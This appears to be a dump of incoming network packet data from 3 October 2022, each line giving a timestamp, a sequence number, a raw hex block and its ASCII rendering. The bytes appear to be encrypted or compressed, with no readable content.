2022-10-03 14:13:31 UTC	76	IN	Data Raw: ef 2f ed f7 31 ce fc 40 c2 11 05 4c de 87 d1 ce f9 44 9e f2 8e 65 01 53 62 ad 31 6d c8 b4 a8 24 2d b3 b6 e8 f3 88 57 73 cc 24 92 8b 5f 30 16 90 af 1c 98 67 b9 86 ee 6f 73 03 7a 4a 9c 9c 3d 47 53 7e f5 38 47 e9 e0 de 44 e4 02 25 6e 8d ab 77 da 9c 6d 76 00 8a 69 7c 89 31 e8 25 ec a8 01 20 23 2e de 4b 8f d7 b4 55 68 61 6a bf 05 7a 81 b6 c8 93 8e b1 23 65 88 ca 38 a1 03 e3 ef 96 13 e0 7c fc 0d 1c f1 ba 21 1f 23 2a 0e 44 05 1a d6 7c c5 a1 42 96 5b bf 5a 9a 47 d3 d6 6f 62 e3 ac 6e 68 27 17 f4 91 3b 48 ad 9a d3 42 47 85 a0 95 68 d2 c3 54 67 12 dd 35 96 9e 2e e1 55 32 0d 25 c8 0d 82 eb 2b 6e ec 97 48 03 db d6 25 6e c5 6c 1c 70 67 a1 72 f5 77 48 50 ab 4e 45 60 d2 49 17 14 28 08 44 10 36 b6 42 22 cc 4d 98 d6 6c 62 11 3c 3b ba 2c f5 c0 16 76 74 32 2d 99 a2 4d 95 12 Data Ascii: /1@LDeSb1m$-Ws$_0goszJ=GS~8GD%nwmvi\|1% #.KUhajz#e8\|!#*D\|B[ZGobnh';HBGhTg5.U2%+nH%nlpgrwHPNE`I(D6B"Mlb<;,vt2-M
2022-10-03 14:13:31 UTC	77	IN	Data Raw: bf 05 27 49 41 fc 1f b3 84 d5 1b da da 8c fc bf d4 37 48 23 54 5e 25 0f c8 52 f7 d2 f8 3f b2 ba d4 e5 03 49 59 54 10 3a f1 27 d6 14 fc 01 9b 91 fd 62 2e f8 57 f0 83 10 cf 17 9b 67 8b f9 ca a8 45 91 fd 59 30 88 ea ed 56 31 bc 67 95 94 5b 7c 81 38 cd be 9c e6 36 da 81 0b 6e d4 f9 4a 2d 7e b4 72 02 99 8f 7e c6 61 69 90 3c fb e7 7d 04 1b 9c 1c 6d be 3f 0b a2 e7 36 97 65 69 03 4b 28 3d b6 5f 8f 85 41 79 4d fa 21 46 15 76 13 3a 79 5a 13 b4 b3 f2 87 61 ed f7 3a 50 61 6a e5 31 67 e5 0b c9 34 b6 63 c5 7a e3 88 c7 b7 14 a8 23 a0 14 c8 f9 62 db a1 3d 05 7b 2c 18 25 ac 10 4f 9f e5 4d 6c fa a3 a3 9d a3 10 82 b0 7d cc 06 75 22 d4 86 3b dc ad 85 bf e3 20 bc 0e 72 b5 92 28 b7 69 87 64 c2 ea 5d 7b 6a 90 13 4d af 45 43 3b 6c 79 bf 78 da 1b be fb 93 35 ba e0 5b 00 af 28 09 Data Ascii: 'IA7H#T^%R?IYT:'b.WgEY0V1g[\|86nJ-~r~ai<}m?6eiK(=_AyM!Fv:yZa:Paj1g4cz#b={,%OMl}u"; r(id]{jMEC;lyx5[(
2022-10-03 14:13:31 UTC	78	IN	Data Raw: 25 c3 71 47 dd 4c 6e 18 2e 00 86 58 84 a1 c2 a0 5e 04 8c 74 5f 7e 2e d6 de 1d 74 79 95 ad a3 c4 36 a3 31 7f 56 94 94 62 36 3a 6d c3 cd 1d 05 82 14 d3 f3 f1 94 a8 86 ec f7 31 0d fe 78 4e 0b 2d 58 cc 89 f3 5f 5b 44 94 eb fd 78 06 7b 30 bc 36 76 cc a6 29 02 0b a5 a5 fc b4 2d 47 73 cc 3c 8b 92 5f 29 16 90 8e 7c af 77 bc a8 01 66 5b f9 6d 62 ab 8f 34 5c 4f 43 ac 3f 5e ce 24 ee 45 e2 14 1c 82 9c a4 e7 e5 ad 0f 40 29 fc 6d 6f 9f 4f e3 2f 83 e1 2c 0e 56 02 cf 5a 8c ab 83 45 63 4f 0d ad 14 76 81 e0 c9 93 82 b1 2f 64 88 c6 01 c6 29 25 ea be e9 8e 39 fb 62 57 f7 ab 3b 63 e4 13 e6 4e 14 11 d0 a1 df 82 f9 9d 4a a7 0b 3f b8 2c 23 45 77 2c b1 5a 4b 18 3f 5e 9b 28 53 f6 7c d0 42 4b e1 c5 a2 68 d8 a6 c9 66 15 f1 4c 31 9e 2e e1 44 39 1c 10 e0 a7 82 76 23 01 f7 58 4a 09 f7 Data Ascii: %qGLn.X^t_~.ty61Vb6:m1xN-X_[Dx{06v)-Gs<_)\|wf[mb4\OC?^$E@)moO/,VZEcOv/d)%9bW;cNJ?,#Ew,ZK?^(S\|BKhfL1.D9v#XJ
2022-10-03 14:13:31 UTC	79	IN	Data Raw: 3f f7 b3 3f 44 da c3 fc 4c 2c b7 e0 fb 2b b8 de da 34 42 22 31 92 a9 2c 37 88 67 91 87 6d 90 dc de dd dd 80 78 97 c6 bc 3e 03 94 20 b5 ee e9 ac ee c4 9e eb d5 af 17 21 49 56 cd d2 b2 a8 d6 7f af 91 8c f6 bf dd 22 72 e9 44 4c 30 3f 30 7b 0c dd e9 31 d5 e8 95 e4 09 3b 4a 76 03 33 9e fd c5 0b d0 ec 91 ac f1 5b fb ec 81 e5 e1 32 ea 04 83 13 96 eb d5 ae a8 97 c0 55 09 5b fe 77 43 58 9e 7b 86 8c 2f 61 93 2f 28 ac b8 f7 26 d8 9b 85 c8 d1 3c 75 d4 7f 98 48 02 92 f1 7d ef c6 62 88 04 55 ee 0e 39 05 84 09 6c b4 3f 13 ac fb e0 33 48 60 3d ad 96 c3 49 46 84 9c 42 72 33 d7 3f 54 ed 66 35 32 61 3f 44 2f 9b 0c 95 6b c3 3b 11 61 67 05 aa 26 27 d7 2a 3a e3 9f 70 d6 62 cb ae d5 a8 12 88 22 9d 04 ce 28 66 5b ea 30 14 74 b1 a0 0b 90 f9 af 5b a6 49 46 bd a9 a2 9d a3 10 87 dc Data Ascii: ??DL,+4B"1,7gmx> !IV"rDL0?0{1;Jv3[2U[wCX{/a/(&<uH}bU9l?3H`=IFBr3?Tf52a?D/k;ag&'*:pb"(f[0t[IF
2022-10-03 14:13:31 UTC	81	IN	Data Raw: b9 c8 9c 30 b7 3f 7b a2 b0 d5 69 09 a7 b3 c7 9e 50 ec 18 35 82 5c 1c cc 89 f4 93 6c 9f 83 39 a2 4d e4 b3 65 32 8b f6 fb a5 14 2c 7e a5 bb a4 46 8c 2e 3f 6b 24 25 d8 53 80 a6 4c 68 13 69 9c 87 58 88 a1 c3 f6 e7 07 8c 78 41 50 fa 25 dd 1b 7e 14 d9 de b9 cc 1e ad 3f 57 ca fa af 66 3d 37 0f 77 a3 21 0d 94 2e c2 f0 d2 fc 8c 3e ed fd 2a 1b e3 56 d4 19 38 60 cb 85 db e6 4b 52 8f ed 60 7a 0e 7b 7c ba 36 7a ce a3 10 3b 26 a2 a9 d8 6f a4 46 75 e4 d2 80 84 71 09 7b 92 a5 05 ba dc bc ae 18 7d 7f 14 60 0d c1 9e 3d 47 56 57 ad 25 22 ca 1d df 4e 8e 37 0d 92 8d ab 7d f6 b6 5e 10 29 b0 6f 6f 93 97 ef fb 0e f3 00 20 24 2c c3 71 cc a9 9b 45 6f 70 53 c1 16 70 a3 06 12 bc a8 cf 6f 75 83 dd 2e a0 3b b6 c4 cb 17 8f 33 ec 0a 0b e7 bc e7 e3 c5 76 0c 4e 1e 00 c6 bb c6 b2 85 0e 62 Data Ascii: 0?{iP5\l9Me2,~F.?k$%SLhiXxAP%~?Wf=7w!.>*V8`KR`z{\|6z;&oFuq{}`=GVW%"N7}^)oo $,qEopSpou.;3vNb
2022-10-03 14:13:31 UTC	81	IN	Data Raw: bf e5 00 b1 0c 73 fa 92 2e 9f 5b 86 64 ce c2 55 7f 71 96 3b 7e 8e 45 49 28 7c 68 bb 50 c0 1b be f0 be 3e c9 fa 06 00 a5 23 7d 33 37 05 60 3b a6 f4 2c c6 20 8d dc aa 5d 26 d2 69 d4 bb 95 8f 58 61 97 10 f4 57 1d 6b 25 6c 48 37 1a cd e6 80 4f 3f 66 40 07 90 11 90 de 82 cb f7 ff 0b 3c 80 04 f1 3c 7d 32 99 60 c6 c2 c8 c6 8f ac ba e4 fa f4 e8 df cb c0 7f ee 35 fc ad 63 bd c7 38 a0 7c 93 93 c6 5e 48 72 1c f3 2b 29 7a 71 39 62 7f 32 2e bb 14 12 0a c3 11 75 b6 cc 96 e8 a4 31 79 d6 9a d5 2e 06 a0 c0 fa 9f 50 ea 2a 3c 93 55 c8 cb e6 b7 74 6e 99 92 25 b3 4b 8b a9 64 32 8c fc c2 b3 13 c0 3d a4 bb 63 57 85 17 5c 75 26 23 bd 1c a9 de 4a 6e 04 0f 9f 4b 59 82 b8 d6 80 b8 d1 9f 7a 5d 70 17 2f e3 62 8d 95 6e 00 ac e3 1e 9f 3b 57 c6 86 9e 17 27 3f 02 74 c7 35 38 94 24 db 2b Data Ascii: s.[dUq;~EI(\|hP>#}37`;, ]&iXaWk%lH7O?f@<<}2`5c8\|^Hr+)zq9b2.u1y.P*<Utn%Kd2=cW\u&#JnKYz]p/bn;W'?t58$+
2022-10-03 14:13:31 UTC	83	IN	Data Raw: 40 11 15 f4 9b 28 16 de 80 d1 40 4f 8e 88 f3 6a d2 c9 84 67 15 f7 74 8a 9e 2e e1 55 32 0d 5a c8 0d 82 64 2b 6e ec 3b 48 03 db cf 25 6e c5 6c 1c 70 67 a1 72 f1 77 43 53 ab 4e 31 60 d2 49 17 14 28 08 44 10 36 40 43 22 cc 4d 88 d7 6c 62 11 13 3d ba 2c f5 c0 16 76 74 09 e0 8b a7 63 82 20 3e 32 82 64 92 92 9e b8 db 47 4f 17 72 2f 7e 0f 67 4a 34 3e e3 2d 24 5e a9 d9 6b 19 18 75 d6 ef 9a a9 1e 9c b3 e4 72 6e fa 62 cb 6a e5 70 30 7c 6c b3 f9 16 e5 e2 a5 50 6c 18 4b 7e b2 90 39 9d 3a e0 20 28 c8 91 52 5b 9b 46 e9 c6 92 e0 80 8d 33 67 02 1f 72 c1 0a 59 c7 53 20 c9 1f 5d 00 a0 7e cd 38 6f 81 23 68 ad 81 69 fe d5 78 26 e4 a7 33 44 c0 f4 15 b3 2d 9d ef c2 10 ae 44 f8 b8 6f 6e 44 b9 80 1d 31 9b 64 96 ce 62 95 b3 9d c3 cb 95 7b 9e c6 a6 4e 27 6b 21 9f f6 d8 b1 17 13 18 Data Ascii: @(@Ojgt.U2Zd+n;H%nlpgrwCSN1`I(D6@C"Mlb=,vtc >2dGOr/~gJ4>-$^kurnbjp0\|lPlK~9: (R[F3grYS ]~8o#hix&3D-DonD1db{N'k!
2022-10-03 14:13:31 UTC	84	IN	Data Raw: d0 4b ab 88 75 aa 02 c9 bf cd 91 16 05 50 b3 19 d5 3c 75 c7 b4 3a ca 64 87 87 2c 9f ef ba 73 3c 4c 43 fa a2 a3 9d a3 dd 8e c5 4d ce 06 7f 28 ec b1 3b dc a7 5b bd ab 44 bb 35 16 f9 92 29 ac 59 83 64 36 eb 5d 7b b9 90 13 5c fd 5f 41 3b 72 73 97 84 fe 1b b8 e9 97 1d 46 e1 04 06 a4 00 5c e6 37 03 6c 3b 84 f5 2c c6 20 9d dd aa 5d 26 ee 69 d4 bb 95 8f 58 61 97 10 9b 57 1d 6b 11 d2 61 3e 1e e5 82 aa 1c 3b 4e 68 2f c4 19 b8 e0 e9 9e f3 d7 32 30 96 06 ce 8a 6f 39 80 7b e8 ac d0 eb 0b 1f ad 38 c1 ef ff d9 f5 bd 76 c6 48 ed a8 74 a8 58 19 bd 74 97 95 e8 45 45 76 16 dd 05 21 52 06 00 2f 78 21 28 a3 39 0d 08 59 3f 68 bd c8 90 c6 86 39 51 a1 b2 9c 2a 15 ad a0 cf 88 43 eb 28 3d 91 4e cf dd 98 cc 68 6f 9f 83 3d b0 5c f5 0c 76 3b 9b e4 a4 a9 15 af 76 b2 85 66 47 8c 3f 5d Data Ascii: KuP<u:d,s<LCM(;[D5)Yd6]{\_A;rsF\7l;, ]&iXaWka>;Nh/20o9{8vHtXtEEv!R/x!(9Y?h9Q*C(=Nho=\v;vfG?]
2022-10-03 14:13:31 UTC	85	IN	Data Raw: b4 7b 11 a9 1c c2 4f 8c f4 64 4e 88 cc 29 b0 03 25 ec 96 15 83 39 df 23 1a e3 8e 31 70 ec 2b 0e f7 14 a9 b0 ab da 8f 53 9d 4b af 64 b3 ba d8 a2 68 67 3d b9 4b 40 0a 27 f0 9b 29 58 de 80 1a 42 4d 9f fb b8 6a d2 c3 81 78 0f df ac 8a 9e 24 c9 17 36 0d 13 e0 3e 82 76 23 64 ea 72 75 03 db c9 1c b2 c5 49 1c 03 9e bb 42 f4 7a 43 54 83 a2 f3 60 d8 70 d6 0f 2a 0e 21 e0 1f 71 47 2b a5 26 a8 d7 66 07 7d 0c 39 b0 39 db cb 81 76 7e 1a f7 9c 8a 0e bf 20 34 2b ab 7e e5 a0 a1 bc d1 4a fd db 70 2f 74 0f 66 77 5f 46 e3 2b 34 7b 91 f1 75 17 0e 8d ff e6 60 a8 47 98 97 97 4f 69 e9 60 d1 47 eb 71 18 33 46 93 fb 79 a0 cb df 56 7d 1b 51 69 bf d7 5e 9b 3a ec 20 37 c8 91 52 1c 33 47 e9 ca ee d7 88 a5 15 72 07 10 4b e4 61 1f c3 7b 50 e1 85 58 13 a1 18 37 1a 6b 8b 0d f0 b2 85 6f 97 Data Ascii: {OdN)%9#1p+SKdhg=K@')XBMjx$6>v#druIBzCT`p*!qG+&f}99v~ 4+~Jp/tfw_F+4{u`GOi`Gq3FyV}Qi^: 7R3GrKa{PX7ko
2022-10-03 14:13:31 UTC	87	IN	Data Raw: e8 ee 19 3a 1a 9c 16 7e b4 2e 24 b3 e2 1f 30 64 69 05 b1 6b 3c b6 d7 9c 8f 50 51 21 c5 20 4a 13 67 19 2b 70 35 52 b5 b3 f4 96 6d c5 2d 39 1d 64 05 a0 63 64 e3 d5 d0 1c 80 63 e0 70 cb be dc 87 16 76 cd b5 19 df e2 71 d6 a1 18 44 71 a2 a9 32 ce eb b0 66 13 2e 4b d2 9f d0 87 ab 03 84 c9 19 86 06 7f 23 d4 e3 3f dc a1 34 86 e7 0a b1 28 3b c0 3a 2c b7 69 8f 0b f8 e8 5d 71 62 be 05 5e a3 7d ce 3f 78 79 ae 56 ee 36 24 f7 9b 3c d5 db 06 00 a5 3b a4 f6 33 3c 03 17 e6 f7 3d c4 20 f6 d9 aa 51 61 e7 6f d4 b7 95 16 58 61 97 2b ad 46 19 49 d0 66 60 38 71 f0 e2 a8 16 15 cc 4a 2f ce 00 9a fc c5 9c f5 f5 6e 19 94 0c ec f5 66 28 82 7c c5 c8 c2 ee 83 be 37 e5 d2 ff ed cb d9 c5 5f 5a 48 fc a7 4d bf c2 31 82 63 91 82 c8 62 6d 05 1f f5 3c 37 df 0b 39 62 78 35 3c a6 14 80 0e c3 Data Ascii: :~.$0dik<PQ! Jg+p5Rm-9dcdcpvqDq2f.K#?4(;:,i]qb^}?xyV6$<;3<= QaoXa+FIf`8qJ/nf(\|7_ZHM1cbm<79bx5<
2022-10-03 14:13:31 UTC	88	IN	Data Raw: 2d 06 88 fa 93 bc b8 b9 15 7b 45 50 b6 3a 61 b2 06 dd 44 e8 1f 25 a5 8d ab 77 28 a4 18 61 06 a0 6f 6f d8 44 f8 2d 83 eb 00 20 78 3c ce 5a 94 b8 8b 54 13 64 7b af 06 70 a9 1c 2f 93 84 df 62 64 88 cc d3 b0 2b 25 61 94 15 8f be f9 0d 1a f8 ab 31 70 c8 2b 0e 4f 16 11 c1 aa 9c aa 53 9d 26 a9 64 24 0c 28 29 69 65 3d b9 4b 40 11 17 f4 9b 28 59 de 95 d1 42 4d 4e 8c a2 68 07 cd 8a 67 00 f7 74 8a bb 2e e1 54 29 3d 1c c8 bf 85 76 29 a0 ec 5a 5b 70 c1 c1 25 64 cf 61 18 70 66 bc 2d cc 75 4a 58 83 18 f6 60 d4 70 33 0a 2a 0e 5a 75 21 73 41 28 e2 74 aa d7 66 7b 31 1f 31 92 80 dd f3 1c 5e 0c 1b e5 90 b1 4d 95 24 3e 38 a9 00 df 8a 9c b2 f9 14 96 c0 74 07 27 1a 62 59 08 2d dc 2f 22 59 88 e0 75 1d 12 60 f9 e1 99 81 b2 b4 c9 ee 5a 1a e8 66 c8 51 ff 62 bd 62 44 93 fc 1b f5 47 Data Ascii: -{EP:aD%w(aooD- x<ZTd{p/bd+%a1p+OS&d$()ie=K@(YBMNhgt.T)=v)Z[p%dapf-uJX`p3*Zu!sA(tf{11^M$>8t'bY-/"Yu`ZfQbbDG
2022-10-03 14:13:31 UTC	89	IN	Data Raw: fb 3a 1b 04 86 02 89 ee 47 b4 56 96 ed 4c 3e 40 cf fb 41 49 0d e7 95 9e 2e d2 90 1e c2 85 d1 f5 3e c1 96 a5 55 41 23 62 2b 68 9c a3 13 9e 94 5a c1 d7 66 87 b7 ef ee 0e 38 09 bf 0b 5d a2 3f 16 3f 60 1e 32 65 cb 14 07 7f 14 f3 58 9e 85 4f 0d ae 47 20 46 12 71 31 51 72 35 58 8f ef 0b 69 94 d2 3e 2a 41 70 16 b6 08 e2 e1 d5 c5 0d 8f 4b f8 74 cb b9 a8 79 1e 76 29 9c 08 ce 20 59 e9 b4 30 12 1a 6c af 1a 95 d6 74 60 3b 58 58 c4 8a aa 4b ba 1b 9f d7 71 fd 57 6e 3f e4 67 28 c4 8c 12 ac f5 19 9c 35 14 e8 b5 47 89 68 87 62 d5 e4 4a f6 76 90 13 4c 9d 67 52 19 6e 68 a7 f4 7d 1b be fb 31 24 98 f4 2c 45 ae 28 aa cf 97 05 60 19 ce 8c 2e c0 02 97 80 a8 57 04 f2 5e d4 bd b7 d3 67 60 9d 3e b7 4f 0a b7 3b 7d 71 30 09 40 e7 a8 1c 3c 75 6c 3e e2 05 81 cc 61 1c f5 ff 00 92 87 2a Data Ascii: :GVL>@AI.>UA#b+hZf8]??`2eXOG Fq1Qr5Xi>ApKtyv) Y0lt`;XXKqWn?g(5GhbJvLgRnh}1$,E(`.W^g`>O;}q0@<ul>a
2022-10-03 14:13:31 UTC	90	IN	Data Raw: 24 ef f7 31 13 d8 77 c2 0a 27 86 de 8e f1 a7 46 44 9e f8 fa 69 01 01 79 be 36 33 de ac 38 a9 27 a2 a3 e5 69 a0 46 56 cc 2e 80 9f 47 22 16 56 a4 0f 92 a6 bc ae 03 1d 69 07 6c 68 a7 b4 c1 4c 45 56 af 2d 65 3d 1d df 42 ee 67 f5 93 8d ad 76 de c4 1c 4b 07 a2 4d 6f 99 2a d0 46 87 eb 06 08 16 3f ce 50 a2 87 8b 54 62 4b 67 a8 3c 12 ab 1c ce bb a6 de 62 6e a0 a7 2d b1 2d 0d df 96 15 85 56 04 0c 1a f1 80 37 03 f7 29 0e 44 3e 16 ae e9 d4 aa 59 f2 0e af 64 2e a9 24 11 29 68 3d b9 59 48 39 52 f6 9b 22 4a db f3 ec 43 4d 88 9b a4 6f c3 cc e5 21 17 f7 7e e5 8d 2c e1 5f 5d 19 17 c8 07 91 7f 11 89 ec 5a 4a 11 d2 eb 30 6c c5 43 0f 77 77 bd 6a bb 73 4a 54 bd 66 c3 60 d2 52 72 3d 31 19 48 1d 0f 74 2e 64 c8 65 a0 c6 6b 07 eb 0f 39 b0 45 e2 f2 16 70 46 a9 e5 9a a2 5a ba 08 52 Data Ascii: $1w'FDiy638'iFV.G"VilhLEV-e=BgvKMo*F?PTbKg<bn--V7)D>Yd.$)h=YH9R"JCMo!~,_]ZJ0lCwwjsJTf`Rr=1Ht.dek9EpFZR
2022-10-03 14:13:31 UTC	92	IN	Data Raw: 01 21 5e 6c e7 2c b3 8e f7 8d b1 93 8a 8f c8 c5 31 6a 86 2b 5c 2f 14 c7 52 5e d5 f8 3f f5 04 d2 e5 0f 15 77 54 10 2b b6 68 d3 14 f0 3a a3 80 fb 40 de 79 53 f6 ea 5e b0 15 91 19 e8 87 c8 b3 5c 9f c4 21 1c 51 ef c5 2f 5a 81 63 bd bc 2f 70 8b 10 52 a9 94 f2 16 f8 89 85 d3 eb a2 66 2a 78 c7 24 11 9e 94 19 90 c4 68 9a 33 c0 90 0a 39 1c b4 65 7a b4 28 29 91 e2 1e 38 4c ed 01 24 6d 14 85 59 9e 85 78 f0 26 c5 26 35 6e 65 19 21 1f 4b 50 b5 b9 e2 9f 04 ba 2f 39 5a 70 df b3 23 74 e9 ed 5c 1d 80 63 cc 61 c1 d0 46 b5 1e 7c 58 33 1b df 25 59 e9 b0 30 1e 4c de ae 1a 9f e6 a1 6a 54 d9 4b d2 9f d8 1e ab 03 84 eb ac cd 06 79 01 cf b1 3b d6 b4 57 b4 f4 00 d4 a5 31 f9 98 53 35 6b 87 6e ec a3 5f 7b 7b 83 18 5c 85 56 56 2d 6b 6d 87 40 fe 1b be eb 86 24 ae 7a 17 0d be 25 b1 eb Data Ascii: !^l,1j+\/R^?wT+h:@yS^\!Q/Zc/pRf*x$h39ez()8L$mYx&&5ne!KP/9Zp#t\caF\|X3%Y0LjTKy;W1S5kn_{{\VV-km@$z%
2022-10-03 14:13:31 UTC	93	IN	Data Raw: cd 50 b7 81 d0 79 1a 19 fa a5 aa 82 b2 c7 14 be 08 93 79 53 4f 9a 35 d2 02 7e 4a 04 de b9 c6 aa b8 34 48 c1 b5 45 64 3d 3d 9e 6f c3 02 01 b4 eb d1 f5 db 0f d6 31 f2 f8 24 28 6c 51 cd 15 3d 47 af 1b ca e9 45 55 be 26 fa 69 01 cf 68 b1 29 6e c0 d2 a4 19 29 bd b0 ef 32 3c 57 7c d3 3a 9e e6 eb 30 19 8f b0 10 aa ea ad a1 0d 78 53 d0 6c 62 ad 00 2c 42 5a 47 9c d2 4d c1 1c 43 55 ed 0b 15 b2 56 ab 7d f6 3a 0f 44 1e 93 70 0b 05 31 f7 32 99 cb a6 20 25 3f 52 4b 85 a7 90 4b 23 fb 6a a0 0b 6c 89 cf c8 93 84 42 73 6b 97 d1 36 eb b7 34 e3 89 0b 94 a5 ec 02 05 e8 b4 62 ec fc 24 03 51 04 9c f0 aa d6 ab 40 92 5b a2 72 04 22 2c 29 69 f5 2c b6 5c 5f 1e 8b e5 94 30 46 b6 1c c0 4d 54 ae 46 a2 68 d2 55 9b 68 0f e8 03 16 8f 21 fa 4a 71 91 04 c7 11 9d 3a b5 7f e3 47 55 44 47 d2 Data Ascii: PyySO5~J4HEd==o1$(lQ=GEU&ih)n)2<W\|:0xSlb,BZGMCUV}:Dp12 %?RKK#jlBsk64b$Q@[r",)i,\_0FMTFhUh!Jq:GUDG
2022-10-03 14:13:31 UTC	94	IN	Data Raw: 1b a7 15 5c e2 dc e8 ae 2d 9b f9 ea 92 af 4e 4f af 55 07 37 84 80 1d 37 8d 6f 0b 56 71 9e f9 de c2 ca 88 5a 9e d7 5f 20 18 6a f7 99 e7 c0 d3 0a 39 61 fe c2 a3 19 09 80 44 d4 26 b9 82 f7 99 b1 93 8a d4 96 c7 31 6a 9a d3 5c 2f 14 c3 73 4f 56 fa 39 d7 aa da cd 9f 39 55 52 38 a9 9c ec dd 13 dc 1b b8 17 ff 4a f0 94 de f4 ec 27 de 1b 87 00 8c c1 56 b2 56 96 fd 53 09 5a 73 fe 54 4f 85 0a 1f 9c 2f 7a 92 36 c0 be 99 cc 4d ca 89 85 c8 cd 32 6f b0 6d b2 48 15 f1 83 74 ee cc 40 08 3e e8 e8 26 1a 1a 9c 10 6d b1 3f 04 9b dd 1e 32 6e 50 42 25 6b 3c c5 39 9c 8f 5a 61 25 d4 27 52 3b fe 1d 2b 76 22 df b2 b3 f4 97 78 ca 3c 36 46 76 00 02 21 68 f0 c5 d4 0c 94 77 d2 fd 98 bf c7 b6 0d 67 32 a0 0f c8 b3 60 c7 a7 18 b6 75 a2 a5 3c 8e fe a6 f0 17 47 58 c2 83 39 b5 b8 03 8e c9 b7 Data Ascii: \-NOU77oVqZ_ j9aD&1j\/sOV99UR8J'VVSZsTO/z6M2omHt@>&m?2nPB%k<9Za%'R;+v"x<6Fv!hwg2`u<GX9
2022-10-03 14:13:31 UTC	95	IN	Data Raw: c2 85 fc a3 2a 40 93 c9 d4 28 15 b6 a1 d6 8f ca ff 35 24 86 4d d5 a1 b2 f6 75 64 8c 89 38 b1 46 ec 9f 74 3e a2 de cb a2 1e b9 5c bc bb 67 46 9e 34 64 84 27 25 d4 4a a1 fe 4d 69 15 06 7d b4 58 82 b3 d4 85 8f 06 8d 72 4c f5 37 24 dd 1c 61 6d 80 d5 91 30 35 a9 3d 41 da 86 87 76 2e 2c 0f 5e cc 1c 0f 94 37 c5 e7 cf bb 30 3f ed f1 28 17 e1 4b ea a0 29 58 d8 91 cd f5 4e 56 8a e9 fd 49 01 52 79 be 25 6f cd bf 10 ff 27 a2 a5 e3 60 d3 7b 72 cc 28 92 8c 66 29 07 9c ca 4c 93 76 ba b8 01 6b 65 14 61 ec 1a 8b e7 5e 50 43 b2 02 59 d0 11 ce 4a 73 02 23 80 9c ae 6a 20 b5 1b 5a 0f 9d b9 7c 97 31 f6 3c 96 da e6 31 28 4b 4a 5a 8a b9 9a 51 7f bd 6c 79 99 41 a9 1c c9 bb 08 dc 62 6e fc c0 29 b1 30 36 e1 87 1d a7 03 fc 0d 10 e6 a6 5e bb ec 2b 04 21 2b 10 c1 ac c0 b9 56 89 59 ab Data Ascii: *@(5$Mud8Ft>\gF4d'%JMi}XrL7$am05=Av.,^70?(K)XNVIRy%o'`{r(f)Lvkea^PCYJs#j Z\|1<1(KJZQlyAbn)06^+!+VY
2022-10-03 14:13:31 UTC	97	IN	Data Raw: 0d 55 78 aa b5 07 95 c4 e7 24 0d da 82 5c 6c ec 55 e4 c0 90 e5 96 b9 ed 62 2e 0c 4b e7 26 09 c1 7b 50 e1 20 5b 13 ad 4e f9 e4 94 7e 3a 5d a0 88 69 e9 f0 1c d8 e5 8d 26 44 cf ca f6 91 05 43 f9 ea 2b 86 eb f6 ae 47 0a 04 84 81 17 95 97 64 94 ca 73 80 d1 c1 c9 35 92 46 90 df bd 28 07 66 32 94 e7 c0 ad 0f 2d 9f f5 e5 b0 1e ac 40 44 d4 2d a0 83 c0 1b a6 9e 8c ed b8 d8 24 9e e8 79 55 3e 15 df 70 ba c2 fe 26 cb 94 db e5 18 30 4c aa 11 0d 95 f4 5a 0c f6 12 91 93 fc 50 e5 f6 57 e7 e1 36 33 16 bd 1f 96 fe dd 9b f8 92 ec 59 ba 4d fa e0 50 4f 8c 7a 87 60 2e 5c 86 3f c5 a6 8b e7 2d c6 89 94 d4 dc 38 9c 2b 52 be 48 14 84 8f 70 4c d9 74 83 37 e8 ff 03 26 09 62 1b 52 b3 38 12 b9 fd 0a 21 69 69 14 29 74 33 48 58 b2 9f 41 76 0a f8 20 46 19 5e dc d5 8f ca 4d a5 a0 f9 96 7a Data Ascii: Ux$\lUb.K&{P [N~:]i&DC+Gds5F(f2-@D-$yU>p&0LZPW63YMPOz`.\?-8+RHpLt7&bR8!ii)t3HXAv F^Mz
2022-10-03 14:13:31 UTC	97	IN	Data Raw: 14 08 f9 88 20 59 cf 88 c7 bc 4c a2 8b b5 7b da c9 9b 6f 0a e4 8a 8b b2 2c ca 50 0a 63 eb 37 f2 8b 05 5a 6c ec 50 60 1d d9 eb 36 5e cc 49 18 75 66 ba 9f f2 77 5b 44 b8 5e ca 94 d6 58 64 0e 3b 18 51 0e e0 70 6d 33 cc 4d 24 d5 6c 62 b5 8c 39 ba 2b ce f6 09 63 6d 0a e5 8b b2 54 9f de 3f 14 a2 7e ee 91 0c 81 c2 4d 92 c0 6d 0c 6d 0e 62 4e 0c 59 1d 2c 0e 47 af f1 5d 33 1a 73 f4 ef 8e c3 ce 9c ca e5 72 62 e3 7a d1 52 fa 65 20 65 49 6d fc 3a ea f2 40 54 6c 1e 47 76 a8 a8 18 88 2a f9 1f f4 cd bd 5d 4b 6c 42 e9 c0 9e f0 9a b5 13 72 12 06 54 1e 0f 75 d0 7d 72 46 1d 5b 19 2b 9b e5 1b 6a 92 20 5f bc 96 79 f8 ec 12 39 fb 5f 3e 79 e5 ce e1 a3 23 8d 63 c2 30 ae 44 f8 7e c8 22 37 85 a9 09 37 88 67 af 64 73 91 d6 a7 4b cb 93 6b e6 5e ae 21 19 17 87 99 e7 d5 bf 30 28 71 f4 Data Ascii: YL{o,Pc7ZlP`6^Iufw[D^Xd;Qpm3M$lb9+cmT?~MmmbNY,G]3srbzRe eIm:@TlGv*]KlBrTu}rF[+j _y9_>y#c0D~"77gdsKk^!0(q
2022-10-03 14:13:31 UTC	99	IN	Data Raw: c9 05 93 73 c5 61 db a9 39 b6 32 75 34 a2 09 df 3e 61 c9 9b ce 15 59 a0 84 1f a7 e8 4b 9f c4 49 4c f8 8e 93 97 a9 4b 8f c3 67 10 06 7f 38 e3 a1 b6 ed a7 5b bc f6 0c aa 22 25 ef 0e 39 b1 7e 91 f8 d5 ec 45 6d ed 81 15 54 98 d9 52 3d 62 6f 23 69 f9 00 a8 66 82 33 a6 f6 98 11 a9 35 b6 7b 26 03 7e 05 7a e6 2a df 01 a9 41 bb 51 11 d0 7b 48 ac bb a3 53 77 01 29 a0 48 11 77 b4 74 66 21 13 db 7c b9 1a 22 68 5c b3 d5 15 8f db fb 02 e4 f9 0a 43 76 0d e6 ec 63 30 9d 07 30 bb c1 e4 8c bf d5 3e d3 ff e6 d6 ce d6 18 52 4a fc a7 69 86 97 31 88 7a 9f 87 e8 aa 47 76 1a ec b7 26 52 0c 38 71 7e 30 2f a4 3e be 1f c4 00 4b 35 4a 96 ee b4 9b 40 ac 82 d7 a6 a2 2b 31 c7 9e 51 4e 28 32 91 54 c8 c6 9d e0 6c e3 cc 83 2c a3 5e ed 87 6c 24 9d 71 da ab 03 b9 e0 b4 b2 7d 50 10 